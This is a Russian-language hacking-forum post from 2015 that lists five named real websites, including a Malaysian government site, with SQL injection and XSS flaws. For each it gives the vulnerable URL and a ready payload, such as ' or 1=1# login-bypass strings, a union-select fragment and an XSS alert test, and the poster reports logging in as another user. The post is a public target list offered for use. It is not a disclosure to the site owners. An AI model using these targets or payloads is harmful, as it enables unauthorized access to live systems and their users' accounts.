30.06.2015, 00:26
|
|
Новичок
Регистрация: 09.06.2015
Сообщений: 24
С нами:
5752406
Репутация:
2
|
|
1)Сайт: http://dogarchive.kennel-apbt.com/
Уязвимость SQLi
Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php
вписываем:
логин - ' or 1=1#
пароль - ' or 1=1 '#
И видим снизу: Online registred users:admin и т.д
2) Сайт: http://lineforheaven.com/soul.php?id=174
Уязвимость: SQLi
Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33, 34,35 --
3)Сайт: https://www.harptabs.com
Уязвимость: SQLi
Эксплойт: https://www.harptabs.com/login.php
Я нашел логин пользователя на сайте и вписал:
Логин: Ceja8460' or 1=1#
Пароль: Ceja8460' or 1=1 '#
Зашло под логином:
Welcome, Ceja8460' or 1=1#
4)Сайт: http://www.ibdb.com/search.php
Уязвимость: XSS
Эксплойт: http://www.ibdb.com/search.php
в поле поиска вписываем: alert('antichat.ru')
5)Сайт: http://www.kpa.gov.my
Уязвимость: XSS(в поиску), SQLi
Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result
SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
http://www.kpa.gov.my/modules/web/page_print.php?id= |
|
|